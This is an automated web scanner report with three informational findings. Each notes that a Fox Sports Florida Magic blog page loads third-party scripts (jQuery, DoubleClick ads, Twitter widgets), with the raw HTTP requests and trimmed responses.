5.1. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660&feedID=3722 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:03:47 GMT
Date: Sat, 12 Feb 2011 02:03:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475546?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475546?" type="text/javascript">
</script>
...[SNIP]...
<div id = "right_magic_blog2_284">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

5.2. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660&feedID=3722 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:07 GMT
Date: Sat, 12 Feb 2011 02:01:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475399?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475399?" type="text/javascript">
</script>
...[SNIP]...
<div id = "right_magic_blog2_284">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

5.3. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:01:06 GMT
Date: Sat, 12 Feb 2011 02:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475914?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475914?" type="text/javascript">
</script>
...[SNIP]...
<div id = "right_magic_blog2_284">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

Report generated by XSS.CX at Mon Feb 14 11:05:35 CST 2011.